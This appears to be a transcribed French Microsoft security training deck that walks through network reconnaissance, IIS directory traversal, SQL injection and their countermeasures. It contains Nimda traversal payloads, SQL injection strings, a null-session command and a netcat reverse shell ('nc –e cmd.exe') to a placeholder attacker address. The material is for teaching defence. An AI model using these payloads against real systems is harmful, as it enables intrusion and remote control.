La présentation est en train de télécharger. S'il vous plaît, attendez

La présentation est en train de télécharger. S'il vous plaît, attendez

Méthodes dattaque et contre-mesures Cyril Voisin Chef de programme sécurité Pascal Sauliere Consultant principal sécurité Microsoft France.

Présentations similaires


Présentation au sujet: "Méthodes dattaque et contre-mesures Cyril Voisin Chef de programme sécurité Pascal Sauliere Consultant principal sécurité Microsoft France."— Transcription de la présentation:

1 Méthodes dattaque et contre-mesures Cyril Voisin Chef de programme sécurité Pascal Sauliere Consultant principal sécurité Microsoft France

2 Avertissement Le but de cette présentation est pédagogique: Illustrer certaines faiblesses, certaines erreurs courantes en sappuyant sur des attaques connues Et surtout en déduire les moyens de mieux vous protéger, pour éviter ces types dattaques Important : les attaques faisant intervenir des vulnérabilités ont été choisies pour illustrer les propos, et font volontairement appel à des vulnérabilités connues depuis plusieurs mois ou années et dont les corrections sont disponibles et largement diffusées

3 Rappel : la loi sanctionne… Loi du 5 janvier 1986 relative a la fraude informatique, dite Loi Godefrain Articles et suivants du Code pénal : Le fait d'accéder ou de se maintenir, frauduleusement, dans tout ou partie d'un système de traitement automatisé de données est puni d'un an d'emprisonnement et de euros d'amende. Lorsqu'il en est résulté soit la suppression ou la modification de données contenues dans le système, soit une altération du fonctionnement de ce système, la peine est de deux ans d'emprisonnement et de euros d'amende : Le fait d'entraver ou de fausser le fonctionnement d'un système de traitement automatisé de données est puni de trois ans d'emprisonnement et de euros d'amende : Le fait d'introduire frauduleusement des données dans un système de traitement automatisé ou de supprimer ou de modifier frauduleusement les données qu'il contient est puni de trois ans d'emprisonnement et de euros d'amende.

4 Démarche théorique… RenseignementScanningÉnumérationPénétration Élévation de privilège Accès interactif Nettoyage

5 …dans la pratique : Énumérer tout ce que lon peut (adresses, ports, services, OS, versions, utilisateurs…) Tester toutes les vulnérabilités connues Contourner les protections, trouver la petite porte Casser les mots de passe Installer son rootkit Cacher ses traces

6 Scénario Jean-Kevin fait un stage au service courrier chez PLA S.A. (Pieds de Lunettes Astronomiques)… …Il est mal payé… …Il a du temps… …Il apporte son PC portable et le branche sur le réseau CSI/FBI Computer Crime and Security Survey : Les formes dattaques citées le plus souvent sont les virus (82%) et les abus par des utilisateurs internes (80%)

7 Réseau à découvrir

8 Ping Sweep Objectif : énumérer les machines qui répondent au Ping (ICMP Echo Request) Outils : Ping (Windows) Nmap -sP (Fyodor, insecure.org) sl -n (ScanLine, ex-fscan de Foundstone) …

9 MARS VENUS HALLEY Adresses et noms

10 Port Scanning Objectif : énumérer les services présents sur une machine (Ports TCP et UDP « ouverts ») Outils : Nmap (insecure.org) sl (Foundstone) SuperScan (Foundstone)

11 MARS VENUS HALLEY DC SMTP HTTP HTTPS DC SQL Services

12 Détermination des versions Versions des OS Versions des services Exemple : Outils : nc (NetCat Nmap -sV -O C:\>nc 80 HEAD / HTTP/1.0 HTTP/ Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 08 Apr :55:19 GMT Content-Type: text/html Content-Length: 172

13 MARS VENUS HALLEY DC IIS DC SQL W2000 Version des OS

14 Énumération NetBIOS Objectifs : machines, domaines, contrôleurs de domaine Outils : NbtstatNbtscan Name Service Type CORP-DC UNIQUE CORP GROUP CORP UNIQUE CORP-DC UNIQUE CORP GROUP INet~Services GROUP IS~CORP-DC UNIQUE CORP UNIQUE ??__MSBROWSE__? GROUP ADMIN UNIQUE Contrôleur de domaine Utilisateur

15 MARS VENUS HALLEY DC IIS DC SQL PLA W2000 FINANCE

16 Contre-mesures Bloquer laccès aux ressources pour les machines qui nappartiennent pas au domaine IPsec avec authentification Kerberos Authentification 802.1x sur les switches Même principe que réseaux Wi-Fi Authentification couche 2

17 Sessions anonymes Accès anonymes à des ressources net use \\server /user:"" "" Nombreux outils pour lister : UtilisateursGroupes Relations dapprobations Contrôleurs de domaine Membres Stratégies de mots de passe

18 Relations dapprobation Système de SSO depuis NT 3.x Si DomB approuve DomA (DomB DomA), un utilisateur de DomA a accès à des ressources de DomB Risque du SSO : Un compte compromis donne accès à lensemble des ressources Découverte des relations dapprobation : nltest /domain_trusts DomA DomB Approbation Accès aux ressources

19 DomA DomB Approbation Accès aux ressources

20 MARS VENUS HALLEY DC IIS DC SQL W2000 pla.net finance.local Approbation

21 Énumération des utilisateurs et groupes Informations intéressantes : Administrateurs Comptes « temporaires », « de test » Comptes de service, applicatifs Comptes inactifs Mots de passe évidents, par défaut, ou en commentaire Outils : Nete, Nbtenum, Enum, UserDump, UserInfo, DumpSec

22 Contre-mesures Sessions anonymes Stratégies de groupe : Windows 2000 : Additional restrictions for anonymous connections Windows XP/2003 : Do not allow anonymous enumeration of SAM accounts Do not allow anonymous enumeration of SAM accounts and shares Let Everyone permissions apply to anonymous users Base de registre

23 Contre-mesures Enumération des utilisateurs Politique de gestion des comptes Comptes administrateurs Politique de mots de passe (longueur, complexité, verrouillage) Audit des comptes inutilisés Sans oublier de supprimer les LMhashes Éviter les outils de « crack » de mots de passe Stratégie de groupe ou registre : NoLMhash=1

24 Attaques dIIS Trouver une vulnérabilité Du serveur Web De lapplication hébergée

25 File System traversal Par défaut (NT4, W2K) : /scripts est exécutable Correspond à C:\Inetpub\Scripts Windows dans C:\WINNT Commandes systèmes dans : scripts/../../winnt/system32 La séquence../ est interdite Des bugs (W2K pré-SP2 et pré- SP3) permettaient de contourner le contrôle de../

26 File System Traversal UNICODE RFC 2279 (codage UTF-8) – décodage après le contrôle de../ %c0%af / %c1%9c \ Corrigé dans MS et W2K SP2 Double decode : décodage UTF-8, contrôle, puis 2 ème décodage.. %252f %2f / %25%32%66 %2f / %255c %5c \ Corrigé dans MS et W2K SP3

27 File System Traversal Pré SP2 : cmd.exe?/c+dir Pré SP3 : system32/cmd.exe?/c+dir Exemples de commandes : cmd.exe /c dir cmd.exe /c echo xxx >> fichier.asp

28 Trace de Nimda, sept /scripts/..%255c../winnt/system32/cmd.exe /scripts/..%5c../winnt/system32/cmd.exe /scripts/root.exe /msadc/root.exe /c/winnt/system32/cmd.exe /d/winnt/system32/cmd.exe /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /scripts/winnt/system32/cmd.exe /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /scripts/..%c1%1c../winnt/system32/cmd.exe /scripts/..%c0%af../winnt/system32/cmd.exe /scripts/..%252f../winnt/system32/cmd.exe /scripts/..%c1%9c../winnt/system32/cmd.exe

29 Mise en œuvre (1) Création de upload.asp (2) Copie de Netcat (nc.exe) et cmdasp.asp (3) Ecoute : nc –l –p 2222 (4) Connexion : nc –e cmd.exe xx.xx.xx.xx 2222 Serveur IIS Attaquant

30 Contre mesures Répertoires web sur un volume séparé IIS Lockdown (désactivation composants inutiles, ACLs) + URLScan Application des correctifs de sécurité (liste avec MBSA) Configurer le pare-feu et les stratégies IPsec pour ne laisser passer que les flux autorisés (source, destination, protocole, port) : TCP 1433 TCP 80, 443 IIS SQL

31 Attaque de SQL Server Trouver une vulnérabilité De SQL Server (ex : Slammer) Des applications utilisant SQL Server (cross site scripting, injection SQL…) Trouver un mot de passe (SQLdict.exe)

32 Injection SQL Non spécifique à IIS, ni à SQL Server Principe : Requête SQL construite avec une entrée de lutilisateur Exemple : sqlCommand.CommandText = "Select title_id, title, price From titles Where title like '%" + TextBox1.Text + "%'"; Select title_id, title, price From titles Where title like '%XXX%' Select title_id, title, price From titles Where title like '%X' Or 1=1--%' Select title_id, title, price From titles Where title like '%X' Union select 'A',name,0 from master..sysdatabases--%'

33 Contre mesures Sécurité intégrée Windows Mots de passe complexes Qualité du code (procédures stockées, requêtes paramétrées, validation des entrées…)

34 Conclusions Erreur de manipulation de ladministrateur Compte de test non désactivé Absence de patch IIS double decode, révélation de code (Blaster, Sasser) Erreur de développement Buffer overflow Injection SQL / utilisation de trop de privilèges Cross-site scripting Config par défaut pas assez sécurisée LMHashRestrictAnonymous

35 Ressources disponibles Security Guidance Center Site Microsoft sur la sécurité (tout public) Site MSDN sur la sécurité (développeurs) (en anglais) Site Technet sur la sécurité (informaticiens) /default.asp S'inscrire aux bulletins de sécurité : erts2.asp (en anglais)

36


Télécharger ppt "Méthodes dattaque et contre-mesures Cyril Voisin Chef de programme sécurité Pascal Sauliere Consultant principal sécurité Microsoft France."

Présentations similaires


Annonces Google